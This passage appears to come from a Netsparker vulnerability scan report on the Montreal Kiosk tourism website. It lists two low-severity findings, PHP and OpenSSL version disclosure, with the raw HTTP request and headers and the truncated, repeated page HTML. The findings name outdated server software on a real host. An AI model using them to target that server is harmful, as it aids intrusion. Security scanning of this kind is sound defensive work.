height="208"></td> <td width="204" valign="top"><table width="204" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="204" height="29"><a href="#directory" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image7','','img/binfo-on.gif',1)"><img src="img/binfo.gif" alt="Montreal Business Directory" name="Image7" width="204" height="30" border="0"></a><a href="montreal-tour/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image10','','img/btour-on.gif',1)"><img src="img/btour.gif" alt="Montreal Tour Guide" name="Image10" width="204" height="29" border="0"></a><a href="montreal-events/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image11','','img/bevents-on.gif',1)"><img src="img/bevents.gif" alt="Montreal Events" name="Image11" width="204" height="29" border="0"></a><a href="quebec-hotels/montreal_quebec_canada_hotels.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image12','','img/bhotel-on.gif',1)"><img src="img/bhotel.gif" alt="Montreal Hotels" name="Image12" width="204" height="29" border="0"></a><a href="about.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image13','','img/babout-on.gif',1)"><img src="img/babout.gif" alt="About Montreal Kiosk" name="Image13" width="204" height="29" border="0"></a></td> </tr> <tr> <form name="form1" method="post" action=""> <td height="52"> <table width="204" height="52" border="0" cellpadding="0" cellspacing="0" background="img/buttonfiller.gif"> <tr> <td width="31">&nbsp;</td> <td width="173" height="29"><!-- #BeginLibraryItem "/Library/quicklinks.lbi" --><select name="montreal" class="smalltext" OnChange="location.href=form1.montreal.options[selectedIndex].value"> <option selected>Quick Links <option value="http://www.montrealkiosk.com/montreal-tour/index.php">Montreal Attractions <option value="http://www.montrealkiosk.com/maps/index.php">Map of Montreal <option value="http://www.montrealkiosk.com/weather.php">Montreal Weather <option value="http://www.montrealkiosk.com/quebec-hotels/montreal_quebec_canada_hotels.php">Montreal Hotels <option value="http://www.montrealkiosk.com/advertising.php">Advertising Information <option value="http://www.montrealkiosk.com/contact.php">Contact Us</select><!-- #EndLibraryItem --></td> </tr> <tr> <td height="33" colspan="2" background="img/bg-button.gif">&nbsp;</td> </tr> </table></td> </form> </tr> </table></td> <td width="493"><img src="img/menupic2.jpg" alt="Montreal, Quebec - A Place to Awaken Your Senses" name="SlideShow" width="493" height="208" id="SlideShow"></td> <td><img src="img/menupic3.jpg" width="183" height="208"></td> </tr> </table></td> <td background="img/bg-menu.jpg" width="1600">&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td colspan="2" valign="top" class="bgmenu"> <table width="314" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="127" valign="top"><table width="127" border="0" cellspacing="0" cellpadding="0"> <tr> <td colspan="2"><img src="img/spc.gif" width="34" height="5"></td> </tr> <tr> <td width="16">&nbsp;</td> <td><table width="96" border="0" cellpadding="0" cellspacing="0"> <tr> <td> <table width="96" height="234" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="22" valign="top"><a href="http://www.montrealkiosk.com/weather.php"><img src="http://www.todaysweather.ca/widget_icons/weather/img2/weather.gif" alt="Montreal Weather" title="Montreal Weather" width="22" height="206" border="0"></a></td><td width="74" height="206" valign="top" background="http://www.todaysweather.ca/widget_icons/weather/img2/weather-bg.gif"> <table width="74" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center"><img src="http://www.todaysweather.ca/widget_icons/weather/img2/thu.gif" alt="Thursday" title="Thursday"></td> </tr> <tr> <td height="60" align="center"><a href="http://www.montrealkiosk.com/weather.php"><img src="http://www.todaysweather.ca/widget_icons//weather/03.gif" alt="Cloudy with sunny periods" title="Cloudy with sunny periods" border="0"></a></td> </tr> <tr> <td height="19" align="center" style="font-size: 10px; font-weight: bold; color: #ffffff; font-family: Arial,Helvetica,sans-serif;">-7&deg;C</td> </tr> <tr> <td align="center"><img src="http://www.todaysweather.ca/widget_icons/weather/img2/fri.gif" alt="Friday" title="Friday"></td> </tr> <tr> <td height="60" align="center"><a href="http://www.montrealkiosk.com/weather.php"><img src="http://www.todaysweather.ca/widget_icons//weather/02.gif" alt="A mix of sun and cloud" title="A mix of sun and cloud" border="0"></a></td> </tr> <tr> <td height="19" align="center" style="font-size: 10px; font-weight: bold; color: #ffffff; font-family: Arial,Helvetica,sans-serif;">-8&deg;C</td> </tr> </table> </td> </tr> <tr> <td colspan="2" style="font-family: Arial,Helvetica,sans-serif; font-size: 10px; color: #333333;" align="center" valign="middle" background="http://www.todaysweather.ca/widget_icons/weather/img2/weather-datebg.gif">Thu, Jan 13th</td> </tr> </table> <br><br><br> </td> </tr> <tr> <td>&nbsp;</td> </tr> <tr> <td><a href="http://www.montrealatnight.ca" target="_blank"><img src="img/banners/atnight.gif" alt="Montreal Nightlife Guide and Adult Directory" width="96" height="47" border="0"></a></td> </tr> <tr> <td>&nbsp;</td> </tr> <tr> <td></td> </tr> </table></td> </tr> </table></td> <td width="187" valign="top" bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><img src="img/titlearrow.gif" width="22" height="22"></td> <td><img src="img/spc.gif" width="4" height="10"></td> <td><NOBR class="maintitle">Montreal Info</NOBR></td> <td><img src="img/spc.gif" width="8" height="10"></td> <td width="1600" bgcolor="#CCCCCC">&nbsp;</td> </tr> <tr> <td colspan="5"><img src="img/spc.gif" width="100" height="3"></td> </tr> </table> <!-- #BeginLibraryItem "/Library/tourism-menu.lbi" --><table width="100%" border="0" cellspacing="3" cellpadding="3"> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="montreal-tourism.php">Montreal Tourism</a></td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="maps/index.php">Montreal Map </a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="montreal-tour/index.php">Montreal Attractions</a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="quebec-hotels/montreal_quebec_canada_hotels.php">Montreal Hotels</a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="movie-listings/index.php">Montreal Movies</a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="weather.php">Montreal Weather </a></td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="history.php">History of Montreal </a></td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="costliving.php">Montreal Cost of Living</a></td> </tr> </table><!-- #EndLibraryItem --></td> </tr> <tr> <td colspan="2" align="right" valign="top" bgcolor="#FFFFFF"&g..
PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /

/

http://www.montrealkiosk.com/

Extracted Version

PHP/5.2.9

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:20:06 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Montreal, Quebec - Restaurants, Events, Hotels, Attractions -- Montreal Kiosk</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><script type="text/javascript" src="http://www.canoe.com/generix/js/generix.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/js/GenFonction.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/external/www.canadiantourismnetwork.com/TagDfpSection.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/external/www.canadiantourismnetwork.com/quebec/TagDfpConfig.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/TagDfpEngine.js"></script><link rel="shortcut icon" href="favicon.ico"><meta name="description" content="Montreal's One Stop Information Kiosk. Links to all major hotels and businesses in Montreal, Quebec, Canada. If you are planning to travel to Montreal this is the guide for you."><script type="text/javascript" src="show.js"></script><link href="main.css" rel="stylesheet" type="text/css"><link href="weather/css/weather2.css" rel="stylesheet" type="text/css" /></head><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="MM_preloadImages('img/bhome-on.gif','img/bsitemap-on.gif','img/bcontact-on.gif','img/bbookmark-on.gif','img/binfo-on.gif','img/btour-on.gif','img/bevents-on.gif','img/bhotel-on.gif','img/babout-on.gif');runSlideShow()"><iframe height="25" width="100%" src="/canoe.php" scrolling="no" marginwidth="0" framespacing="0" marginheight="0" frameborder="0" allowtransparency="true"></iframe><table width="747" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td colspan="2"><img src="img/spc.gif" width="200" height="2"></td> </tr> <tr bgcolor="#333333"> <td width="730" height="92" align="center" valign="middle"><script language='JavaScript' type='text/javascript' src='http://www.uberip.com/adserver/adx.js'></script><script language='JavaScript' type='text/javascript'><!-- if (!document.phpAds_used) document.phpAds_used = ','; phpAds_random = new String (Math.random()); phpAds_random = phpAds_random.substring(2,11); document.write ("<" + "script language='JavaScript' type='text/javascript' src='"); document.write ("http://www.uberip.com/adserver/adjs.php?n=" + phpAds_random); document.write ("&amp;what=zone:4"); document.write ("&amp;exclude=" + document.phpAds_used); if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer)); document.write ("'><" + "/script>");//--></script><noscript><a href='http://www.uberip.com/adserver/adclick.php?n=aae0fd6b' target='_blank'><img src='http://www.uberip.com/adserver/adview.php?what=zone:4&amp;n=aae0fd6b' border='0' alt=''></a></noscript></td> <td width="17"><a href="advertising-rate-card.php"><img src="img/banners/advertising.gif" alt="Montreal Advertising" width="17" height="92" border="0"></a></td> </tr> <tr> <td colspan="2"><img src="img/spc.gif" width="200" height="3"></td> </tr></table><table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="top"> <td height="298" background="img/bg-menu.jpg" width="1600">&nbsp;</td> <td colspan="5" background="img/bg-menu.jpg"><table width="1000" border="0" cellspacing="0" cellpadding="0"> <tr> <td colspan="4"><table width="1000" border="0" cellspacing="0" cellpadding="0"> <tr valign="top"> <td width="551"><a href="/index.php"><img src="img/montreal.gif" alt="Montreal Kiosk - Your Guide to Montreal, Quebec. Book Montreal Hotel accommodations here... read up on our Montreal Tour Guide and Montreal events." width="551" height="90" border="0"></a></td> <td><a href="index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image2','','img/bhome-on.gif',1)"><img src="img/bhome.gif" alt="Montreal, Quebec" name="Image2" width="41" height="30" border="0"></a><a href="sitemap.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image3','','img/bsitemap-on.gif',1)"><img src="img/bsitemap.gif" alt="Site Map" name="Image3" width="55" height="30" border="0"></a><a href="contact.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image4','','img/bcontact-on.gif',1)"><img src="img/bcontact.gif" alt="Montreal Kiosk Contact Info" name="Image4" width="74" height="30" border="0"></a><a href="javascript:addBookmark('Montreal Kiosk - Your Guide to Montreal, Quebec','http://www.montrealkiosk.com')" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image5','','img/bbookmark-on.gif',1)"><img src="img/bbookmark.gif" alt="Bookmark Montreal Kiosk" name="Image5" width="96" height="30" border="0"></a></td> </tr> </table></td> </tr> <tr> <td width="120"><img src="img/menupic1.jpg" width="120" height="208"></td> <td width="204" valign="top"><table width="204" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="204" height="29"><a href="#directory" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image7','','img/binfo-on.gif',1)"><img src="img/binfo.gif" alt="Montreal Business Directory" name="Image7" width="204" height="30" border="0"></a><a href="montreal-tour/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image10','','img/btour-on.gif',1)"><img src="img/btour.gif" alt="Montreal Tour Guide" name="Image10" width="204" height="29" border="0"></a><a href="montreal-events/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image11','','img/bevents-on.gif',1)"><img src="img/bevents.gif" alt="Montreal Events" name="Image11" width="204" height="29" border="0"></a><a href="quebec-hotels/montreal_quebec_canada_hotels.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image12','','img/bhotel-on.gif',1)"><img src="img/bhotel.gif" alt="Montreal Hotels" name="Image12" width="204" height="29" border="0"></a><a href="about.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image13','','img/babout-on.gif',1)"><img src="img/babout.gif" alt="About Montreal Kiosk" name="Image13" width="204" height="29" border="0"></a></td> </tr> <tr> <form name="form1" method="post" action=""> <td height="52"> <table width="204" height="52" border="0" cellpadding="0" cellspacing="0" background="img/buttonfiller.gif"> <tr> <td width="31">&nbsp;</td> <td width="173" height="29"><!-- #BeginLibraryItem "/Library/quicklinks.lbi" --><select name="montreal" class="smalltext" OnChange="location.href=form1.montreal.options[selectedIndex].value"> <option selected>Quick Links <option value="http://www.montrealkiosk.com/montreal-tour/index.php">Montreal Attractions <option value="http://www.montrealkiosk.com/maps/index.php">Map of Montreal <option value="http://www.montrealkiosk.com/weather.php">Montreal Weather <option value="http://www.montrealkiosk.com/quebec-hotels/montreal_quebec_canada_hotels.php">Montreal Hotels <option value="http://www.montrealkiosk.com/advertising.php">Advertising Information <option value="http://www.montrealkiosk.com/contact.php">Contact Us</select><!-- #EndLibraryItem --></td> </tr> <tr> <td height="33" colspan="2" background="img/bg-button.gif">&nbsp;</td> </tr> </table></td> </form> </tr> </table></td> <td width="493"><img src="img/menupic2.jpg" alt="Montreal, Quebec - A Place to Awaken Your Senses" name="SlideShow" width="493" height="208" id="SlideShow"></td> <td><img src="img/menupic3.jpg" width="183" height="208"></td> </tr> </table></td> <td background="img/bg-menu.jpg" width="1600">&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td colspan="2" valign="top" class="bgmenu"> <table width="314" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="127" valign="top"><table width="127" border="0" cellspacing="0" cellpadding="0"> <tr> <td colspan="2"><img src="img/spc.gif" width="34" height="5"></td> </tr> <tr> <td width="16">&nbsp;</td> <td><table width="96" border="0" cellpadding="0" cellspacing="0"> <tr> <td> <table width="96" height="234" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="22" valign="top"><a href="http://www.montrealkiosk.com/weather.php"><img src="http://www.todaysweather.ca/widget_icons/weather/img2/weather.gif" alt="Montreal Weather" title="Montreal Weather" width="22" height="206" border="0"></a></td><td width="74" height="206" valign="top" background="http://www.todaysweather.ca/widget_icons/weather/img2/weather-bg.gif"> <table width="74" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center"><img src="http://www.todaysweather.ca/widget_icons/weather/img2/thu.gif" alt="Thursday" title="Thursday"></td> </tr> <tr> <td height="60" align="center"><a href="http://www.montrealkiosk.com/weather.php"><img src="http://www.todaysweather.ca/widget_icons//weather/03.gif" alt="Cloudy with sunny periods" title="Cloudy with sunny periods" border="0"></a></td> </tr> <tr> <td height="19" align="center" style="font-size: 10px; font-weight: bold; color: #ffffff; font-family: Arial,Helvetica,sans-serif;">-7&deg;C</td> </tr> <tr> <td align="center"><img src="http://www.todaysweather.ca/widget_icons/weather/img2/fri.gif" alt="Friday" title="Friday"></td> </tr> <tr> <td height="60" align="center"><a href="http://www.montrealkiosk.com/weather.php"><img src="http://www.todaysweather.ca/widget_icons//weather/02.gif" alt="A mix of sun and cloud" title="A mix of sun and cloud" border="0"></a></td> </tr> <tr> <td height="19" align="center" style="font-size: 10px; font-weight: bold; color: #ffffff; font-family: Arial,Helvetica,sans-serif;">-8&deg;C</td> </tr> </table> </td> </tr> <tr> <td colspan="2" style="font-family: Arial,Helvetica,sans-serif; font-size: 10px; color: #333333;" align="center" valign="middle" background="http://www.todaysweather.ca/widget_icons/weather/img2/weather-datebg.gif">Thu, Jan 13th</td> </tr> </table> <br><br><br> </td> </tr> <tr> <td>&nbsp;</td> </tr> <tr> <td><a href="http://www.montrealatnight.ca" target="_blank"><img src="img/banners/atnight.gif" alt="Montreal Nightlife Guide and Adult Directory" width="96" height="47" border="0"></a></td> </tr> <tr> <td>&nbsp;</td> </tr> <tr> <td></td> </tr> </table></td> </tr> </table></td> <td width="187" valign="top" bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><img src="img/titlearrow.gif" width="22" height="22"></td> <td><img src="img/spc.gif" width="4" height="10"></td> <td><NOBR class="maintitle">Montreal Info</NOBR></td> <td><img src="img/spc.gif" width="8" height="10"></td> <td width="1600" bgcolor="#CCCCCC">&nbsp;</td> </tr> <tr> <td colspan="5"><img src="img/spc.gif" width="100" height="3"></td> </tr> </table> <!-- #BeginLibraryItem "/Library/tourism-menu.lbi" --><table width="100%" border="0" cellspacing="3" cellpadding="3"> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="montreal-tourism.php">Montreal Tourism</a></td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="maps/index.php">Montreal Map </a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="montreal-tour/index.php">Montreal Attractions</a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="quebec-hotels/montreal_quebec_canada_hotels.php">Montreal Hotels</a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="movie-listings/index.php">Montreal Movies</a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="weather.php">Montreal Weather </a></td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="history.php">History of Montreal </a></td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="costliving.php">Montreal Cost of Living</a></td> </tr> </table><!-- #EndLibraryItem --></td> </tr> <tr> <td colspan="2" align="right" valign="top" bgcolor="#FFFFFF"&g..
OpenSSL Version Disclosure

OpenSSL Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing OpenSSL version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks.

Impact

An attacker can look for specific security vulnerabilities for the identified version. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /

/

http://www.montrealkiosk.com/

Extracted Version

OpenSSL/0.9.7a

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:20:06 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Montreal, Quebec - Restaurants, Events, Hotels, Attractions -- Montreal Kiosk</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><script type="text/javascript" src="http://www.canoe.com/generix/js/generix.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/js/GenFonction.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/external/www.canadiantourismnetwork.com/TagDfpSection.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/external/www.canadiantourismnetwork.com/quebec/TagDfpConfig.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/TagDfpEngine.js"></script><link rel="shortcut icon" href="favicon.ico"><meta name="description" content="Montreal's One Stop Information Kiosk. Links to all major hotels and businesses in Montreal, Quebec, Canada. If you are planning to travel to Montreal this is the guide for you."><script type="text/javascript" src="show.js"></script><link href="main.css" rel="stylesheet" type="text/css"><link href="weather/css/weather2.css" rel="stylesheet" type="text/css" /></head><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="MM_preloadImages('img/bhome-on.gif','img/bsitemap-on.gif','img/bcontact-on.gif','img/bbookmark-on.gif','img/binfo-on.gif','img/btour-on.gif','img/bevents-on.gif','img/bhotel-on.gif','img/babout-on.gif');runSlideShow()"><iframe height="25" width="100%" src="/canoe.php" scrolling="no" marginwidth="0" framespacing="0" marginheight="0" frameborder="0" allowtransparency="true"></iframe><table width="747" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td colspan="2"><img src="img/spc.gif" width="200" height="2"></td> </tr> <tr bgcolor="#333333"> <td width="730" height="92" align="center" valign="middle"><script language='JavaScript' type='text/javascript' src='http://www.uberip.com/adserver/adx.js'></script><script language='JavaScript' type='text/javascript'><!-- if (!document.phpAds_used) document.phpAds_used = ','; phpAds_random = new String (Math.random()); phpAds_random = phpAds_random.substring(2,11); document.write ("<" + "script language='JavaScript' type='text/javascript' src='"); document.write ("http://www.uberip.com/adserver/adjs.php?n=" + phpAds_random); document.write ("&amp;what=zone:4"); document.write ("&amp;exclude=" + document.phpAds_used); if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer)); document.write ("'><" + "/script>");//--></script><noscript><a href='http://www.uberip.com/adserver/adclick.php?n=aae0fd6b' target='_blank'><img src='http://www.uberip.com/adserver/adview.php?what=zone:4&amp;n=aae0fd6b' border='0' alt=''></a></noscript></td> <td width="17"><a href="advertising-rate-card.php"><img src="img/banners/advertising.gif" alt="Montreal Advertising" width="17" height="92" border="0"></a></td> </tr> <tr> <td colspan="2"><img src="img/spc.gif" width="200" height="3"></td> </tr></table><table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="top"> <td height="298" background="img/bg-menu.jpg" width="1600">&nbsp;</td> <td colspan="5" background="img/bg-menu.jpg"><table width="1000" border="0" cellspacing="0" cellpadding="0"> <tr> <td colspan="4"><table width="1000" border="0" cellspacing="0" cellpadding="0"> <tr valign="top"> <td width="551"><a href="/index.php"><img src="img/montreal.gif" alt="Montreal Kiosk - Your Guide to Montreal, Quebec. Book Montreal Hotel accommodations here... read up on our Montreal Tour Guide and Montreal events." width="551" height="90" border="0"></a></td> <td><a href="index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image2','','img/bhome-on.gif',1)"><img src="img/bhome.gif" alt="Montreal, Quebec" name="Image2" width="41" height="30" border="0"></a><a href="sitemap.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image3','','img/bsitemap-on.gif',1)"><img src="img/bsitemap.gif" alt="Site Map" name="Image3" width="55" height="30" border="0"></a><a href="contact.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image4','','img/bcontact-on.gif',1)"><img src="img/bcontact.gif" alt="Montreal Kiosk Contact Info" name="Image4" width="74" height="30" border="0"></a><a href="javascript:addBookmark('Montreal Kiosk - Your Guide to Montreal, Quebec','http://www.montrealkiosk.com')" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image5','','img/bbookmark-on.gif',1)"><img src="img/bbookmark.gif" alt="Bookmark Montreal Kiosk" name="Image5" width="96" height="30" border="0"></a></td> </tr> </table></td> </tr> <tr> <td width="120"><img src="img/menupic1.jpg" width="120" height="208"></td> <td width="204" valign="top"><table width="204" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="204" height="29"><a href="#directory" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image7','','img/binfo-on.gif',1)"><img src="img/binfo.gif" alt="Montreal Business Directory" name="Image7" width="204" height="30" border="0"></a><a href="montreal-tour/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image10','','img/btour-on.gif',1)"><img src="img/btour.gif" alt="Montreal Tour Guide" name="Image10" width="204" height="29" border="0"></a><a href="montreal-events/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image11','','img/bevents-on.gif',1)"><img src="img/bevents.gif" alt="Montreal Events" name="Image11" width="204" height="29" border="0"></a><a href="quebec-hotels/montreal_quebec_canada_hotels.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image12','','img/bhotel-on.gif',1)"><img src="img/bhotel.gif" alt="Montreal Hotels" name="Image12" width="204" height="29" border="0"></a><a href="about.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image13','','img/babout-on.gif',1)"><img src="img/babout.gif" alt="About Montreal Kiosk" name="Image13" width="204" height="29" border="0"></a></td> </tr> <tr> <form name="form1" method="post" action=""> <td height="52"> <table width="204" height="52" border="0" cellpadding="0" cellspacing="0" background="img/buttonfiller.gif"> <tr> <td width="31">&nbsp;</td> <td width="173" height="29"><!-- #BeginLibraryItem "/Library/quicklinks.lbi" --><select name="montreal" class="smalltext" OnChange="location.href=form1.montreal.options[selectedIndex].value"> <option selected>Quick Links <option value="http://www.montrealkiosk.com/montreal-tour/index.php">Montreal Attractions <option value="http://www.montrealkiosk.com/maps/index.php">Map of Montreal <option value="http://www.montrealkiosk.com/weather.php">Montreal Weather <option value="http://www.montrealkiosk.com/quebec-hotels/montreal_quebec_canada_hotels.php">Montreal Hotels <option value="http://www.montrealkiosk.com/advertising.php">Advertising Information <option value="http://www.montrealkiosk.com/contact.php">Contact Us</select><!-- #EndLibraryItem --></td> </tr> <tr> <td height="33" colspan="2" background="img/bg-button.gif">&nbsp;</td> </tr> </table></td> </form> </tr> </table></td> <td width="493"><img src="img/menupic2.jpg" alt="Montreal, Quebec - A Place to Awaken Your Senses" name="SlideShow" width="493" height="208" id="SlideShow"></td> <td><img src="img/menupic3.jpg" width="183" height="208"></td> </tr> </table></td> <td background="img/bg-menu.jpg" width="1600">&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td colspan="2" valign="top" class="bgmenu"> <table width="314" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="127" valign="top"><table width="127" border="0" cellspacing="0" cellpadding="0"> <tr> <td colspan="2"><img src="img/spc.gif" width="34" height="5"></td> </tr> <tr> <td width="16">&nbsp;</td> <td><table width="96" border="0" cellpadding="0" cellspacing="0"> <tr> <td> <table width="96" height="234" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="22" valign="top"><a href="http://www.montrealkiosk.com/weather.php"><img src="http://www.todaysweather.ca/widget_icons/weather/img2/weather.gif" alt="Montreal Weather" title="Montreal Weather" width="22" height="206" border="0"></a></td><td width="74" height="206" valign="top" background="http://www.todaysweather.ca/widget_icons/weather/img2/weather-bg.gif"> <table width="74" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center"><img src="http://www.todaysweather.ca/widget_icons/weather/img2/thu.gif" alt="Thursday" title="Thursday"></td> </tr> <tr> <td height="60" align="center"><a href="http://www.montrealkiosk.com/weather.php"><img src="http://www.todaysweather.ca/widget_icons//weather/03.gif" alt="Cloudy with sunny periods" title="Cloudy with sunny periods" border="0"></a></td> </tr> <tr> <td height="19" align="center" style="font-size: 10px; font-weight: bold; color: #ffffff; font-family: Arial,Helvetica,sans-serif;">-7&deg;C</td> </tr> <tr> <td align="center"><img src="http://www.todaysweather.ca/widget_icons/weather/img2/fri.gif" alt="Friday" title="Friday"></td> </tr> <tr> <td height="60" align="center"><a href="http://www.montrealkiosk.com/weather.php"><img src="http://www.todaysweather.ca/widget_icons//weather/02.gif" alt="A mix of sun and cloud" title="A mix of sun and cloud" border="0"></a></td> </tr> <tr> <td height="19" align="center" style="font-size: 10px; font-weight: bold; color: #ffffff; font-family: Arial,Helvetica,sans-serif;">-8&deg;C</td> </tr> </table> </td> </tr> <tr> <td colspan="2" style="font-family: Arial,Helvetica,sans-serif; font-size: 10px; color: #333333;" align="center" valign="middle" background="http://www.todaysweather.ca/widget_icons/weather/img2/weather-datebg.gif">Thu, Jan 13th</td> </tr> </table> <br><br><br> </td> </tr> <tr> <td>&nbsp;</td> </tr> <tr> <td><a href="http://www.montrealatnight.ca" target="_blank"><img src="img/banners/atnight.gif" alt="Montreal Nightlife Guide and Adult Directory" width="96" height="47" border="0"></a></td> </tr> <tr> <td>&nbsp;</td> </tr> <tr> <td></td> </tr> </table></td> </tr> </table></td> <td width="187" valign="top" bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><img src="img/titlearrow.gif" width="22" height="22"></td> <td><img src="img/spc.gif" width="4" height="10"></td> <td><NOBR class="maintitle">Montreal Info</NOBR></td> <td><img src="img/spc.gif" width="8" height="10"></td> <td width="1600" bgcolor="#CCCCCC">&nbsp;</td> </tr> <tr> <td colspan="5"><img src="img/spc.gif" width="100" height="3"></td> </tr> </table> <!-- #BeginLibraryItem "/Library/tourism-menu.lbi" --><table width="100%" border="0" cellspacing="3" cellpadding="3"> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="montreal-tourism.php">Montreal Tourism</a></td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="maps/index.php">Montreal Map 